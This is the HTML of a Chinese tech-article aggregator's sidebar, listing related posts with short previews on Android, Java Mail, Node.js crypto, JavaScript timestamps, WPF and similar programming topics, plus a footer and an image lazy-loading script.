										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zOlk7mb.html" rel="bookmark" class="title">link中如何根据treeviw查询，返回的结果放在gridview里，怎么实现？</a>
					<div>
						问题描述 link中如何根据treeviw查询,返回的结果放在gridview里,怎么实现? link中如何根据treeviw查询,返回的结果放在gridview里,怎么实现?					</div>
				</div>
			</div>
						<div class="item clearfix">
									<a href="https://www.iamivan.net/a/zGAdjOM.html" class="thumbnail">
				<img src="/assets/blank.gif" data-echo="//pic.ikafan.com/imgp/L3Byb3h5L2h0dHAvaW1nLmJsb2cuY3Nkbi5uZXQvMjAxNzAyMjQxOTA0Mzc4ODQ/d2F0ZXJtYXJrLzIvdGV4dC9hSFIwY0RvdkwySnNiMmN1WTNOa2JpNXVaWFF2YjNWNVlXNW5YM0JsYm1jPS9mb250LzVhNkw1TDJUL2ZvbnRzaXplLzQwMC9maWxsL0kwSkJRa0ZDTUE9PS9kaXNzb2x2ZS83MC9ncmF2aXR5L1NvdXRoRWFzdA==.jpg">
							</a>
							<div class="info"   >
					<a href="https://www.iamivan.net/a/zGAdjOM.html" rel="bookmark" class="title">【我的Android进阶之旅】快速创建和根据不同的版本类型（Dev、Beta、Release）发布Android 开发库到Maven私服</a>
					<div>
						前言 由于项目越来越多,有很多公共的代码都可以抽取出一个开发库出来传到公司搭建好的Maven私服,以供大家使用. 之前搭建的Maven仓库只有Release和Snapshot两个仓库,最近由于开发库有 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/boRXQdz.html" rel="bookmark" class="title">网络畅&OpenCurlyDoubleQuote;邮&rdquo; 分享国内五大常用电子邮箱服务</a>
					<div>
						中介交易 SEO诊断 淘宝客 云主机 技术大厅 随着网络科技这日新月异的变化,在工作和生活上,人们已经越来越习惯于用互联网作为沟通工具.而互联网沟通工具运用最为广泛的莫过于电子邮件.近日消息得知,电子 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/b2Pvwqp.html" rel="bookmark" class="title">wi-fi-Android通过代码连接指定wifi，怎样设置连接不保存密码，或连接后删除密码？</a>
					<div>
						问题描述 Android通过代码连接指定wifi,怎样设置连接不保存密码,或连接后删除密码? Android通过代码连接指定wifi,怎样设置连接不保存密码,或连接后删除密码? 解决方案 如何获取连接 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MqAXlYM.html" rel="bookmark" class="title">c&plus;&plus;网络程序怎么做单元测试，涉及到多线程</a>
					<div>
						问题描述 c++网络程序怎么做单元测试,涉及到多线程 急!谢谢!c++网络程序怎么做单元测试,涉及到多线程,而且测试的类内部还调用了其他类来创建线程. 解决方案 就是测试对应的函数好了,比如程序发送数 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/p5Zo4Dz.html" rel="bookmark" class="title">connection-Java Mail接收邮件连接超时异常</a>
					<div>
						问题描述 Java Mail接收邮件连接超时异常 通过命令行telnet可以成功实现邮件的接收,但JavaMaik总是报连接超时的异常,代码如下: @Controller public class R ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MrXWm1z.html" rel="bookmark" class="title">这里有五个理由告诉你为什么飞信干不过微信业界</a>
					<div>
						提起飞信,或许有些人会有些许陌生,飞信是即时通信的一种,不能简单理解飞信是即时通信工具,这样可能更准确:飞信曾经是由PC即时通信向手机客户端转移的一个典型的产品代表,是中国移动推出的一项业务,可以实现 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/p8A6gNz.html" rel="bookmark" class="title">extjs chart显示问题</a>
					<div>
						问题描述 很奇怪的问题,从官网的example抄来的代码运行有问题....alert(3)那句代码没有执行到,注释掉Items就可以看到window以及alert(3)语句的执行.求高手分析为什么不能 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/bB1oQNz.html" rel="bookmark" class="title">浅谈如何巧借时事热点 提升站点流量</a>
					<div>
						中介交易 http://www.aliyun.com/zixun/aggregation/6858.html&quot;&gt;SEO诊断 淘宝客 云主机 技术大厅 在去年,互联网最为引发关注的便是方 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/bBgRZAM.html" rel="bookmark" class="title">集富亚洲</a>
					<div>
						中文名称:集富亚洲 英文名称:Jafco Asia 网站: http:// www.jafcoasia.com 总部所在地: 香港 电话: 86-10-65909730 传真: 86-10-65909 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/Mye14EM.html" rel="bookmark" class="title">listView怎么实现点一下 在上面加一个箭头&quest;</a>
					<div>
						问题描述 我已经知道怎么整排序了,然后也能加上箭头就是升序是↑降序是↓这样的箭头..看着不专业,我想要那种黑色上三角形那样的效果.不知道怎么弄上去.刚在百度上问说是OwnerDraw改成true自己重 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zVQR3Bp.html" rel="bookmark" class="title">重写的baseadapter里面不调用getview方法</a>
					<div>
						问题描述 重写的baseadapter里面不调用getview方法 getcount()方法返回值不为空.. 解决方案 检查ListView的父控件中是否含有ScrollView控件,滑动会冲突的 解 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/bQjqvGM.html" rel="bookmark" class="title">大虾们 帮帮忙啊</a>
					<div>
						问题描述 一直有个疑惑 学校做的web项目 和外面公司做的有什么区别去实习一个月和不去实习而自己接个项目来做效果会差很远吗 解决方案 实习不用去,自己做最好.实习不会给你重要的任务做:自己做反而自己了 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/M6G2kOp.html" rel="bookmark" class="title">我们应该重视云备份起来</a>
					<div>
						云计算改变了我们互联网时代,而作为其最主要的产品--云存储,也革新了我们保存文件的方式,对于大部分已经建好的云存储供应商来说,都使用了最好的安全和可加密技术,不过在这样的情况下,虽然确保了我们自己文件 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zGrLXnp.html" rel="bookmark" class="title">NODE&period;JS加密模块CRYPTO常用方法介绍&lowbar;node&period;js</a>
					<div>
						使用require('crypto')调用加密模块. 加密模块需要底层系统提供OpenSSL的支持.它提供了一种安全凭证的封装方式,可以用于HTTPS安全网络以及普通HTTP连接. 该模块还提供了一套 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/bBkLoAM.html" rel="bookmark" class="title">JavaScript日期时间与时间戳的转换函数分享&lowbar;javascript技巧</a>
					<div>
						如果只是将当前时间转成时间戳,可以直接使用new Date().getTime()/1000:但如果是将某个具体时间或日期转成Unix时间戳,ie不支持像new Date(&quot;2013-1-1 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/p5QlR7p.html" rel="bookmark" class="title">ios-请问cell动态行高时为什么取消textview的scroll enable就不能自动换行了？</a>
					<div>
						问题描述 请问cell动态行高时为什么取消textview的scroll enable就不能自动换行了? 用的autolayout添加上下距离限制的方式实现的cell(textview)自动行高.te ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/M9N1YXp.html" rel="bookmark" class="title">python怎么调用repo命令，执行文件push到服务器上？</a>
					<div>
						问题描述 python怎么调用repo命令,执行文件push到服务器上? python怎么调用repo命令,执行文件push到服务器上?或者调用git命令,执行文件push到服务器上?最好搞几行代码把					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/zDXWmvz.html" rel="bookmark" class="title">web service 拦截器</a>
					<div>
						服务端拦截器: package com.xh.ws.test; import javax.xml.ws.Endpoint; import org.apache.cxf.interceptor.Logg ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MvWvl5p.html" rel="bookmark" class="title">《Core Data应用开发实践指南》一2&period;3　实体</a>
					<div>
						2.3 实体 托管对象模型由一系列实体描述对象构成,这种对象就叫做实体.实体就好比一把饼干模型切割刀,用于创建托管对象.有了托管对象之后,我们就可以用Objective-C代码来操作其中的数据了.托管 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/MA6JqQp.html" rel="bookmark" class="title">《语义网基础教程（原书第3版）》&mdash;&mdash; 2&period;1　引言</a>
					<div>
						2.1 引言 万维网的成功展现了使用标准化的信息交换和通信机制的力量.HTML是编辑网页的标准语言.它允许任何人发布一个文档并且相信该文档可以被任何万维网浏览器正确呈现.HTML和其他交换语言都拥有以 ...					</div>
				</div>
			</div>
						<div class="item clearfix">
										<div class="info"  style="max-width: 100%;" >
					<a href="https://www.iamivan.net/a/bK0gq5M.html" rel="bookmark" class="title">wpf 如何用keydown事件获得键盘输入的字符</a>
					<div>
						问题描述 WPF:richtextbox控件中,如果使用英文输入法,可以通过keydown事件的e.key这个属性获得输入的字母:但是,如果切换成汉字输入法之后,如何通过keydown事件获得按下的键 ...					</div>
				</div>
			</div>
			
		</div>
	</div>

	<div class="box">
		<div class="box-heading">
			<span>热搜</span>
		</div>
		<div class="box-content">
					</div>
	</div>


</aside>
      </div>
    </div>
    <!-- /.container -->

    <div id="copyright">
      <div class="pull-left">
        &#169; 2024 iVAN        | info#iamivan.net        | 11 q. 0.033 s.
      </div>

    </div>

  </div><!--/.wrapper -->


  <!-- <script src="/assets/js/jquery.js"></script>
  <script src="/assets/js/bootstrap.min.js"></script> -->
  <div style=" display: none ";>
  </div>

<script src="/assets/js/echo.js"></script>
<script>
    echo.init({
      offset: 100,
      throttle: 250,
      unload: false,
      callback: function (element, op) {
        console.log(element, 'has been', op + 'ed')
      }
    });
    </script>
</body>
</html>
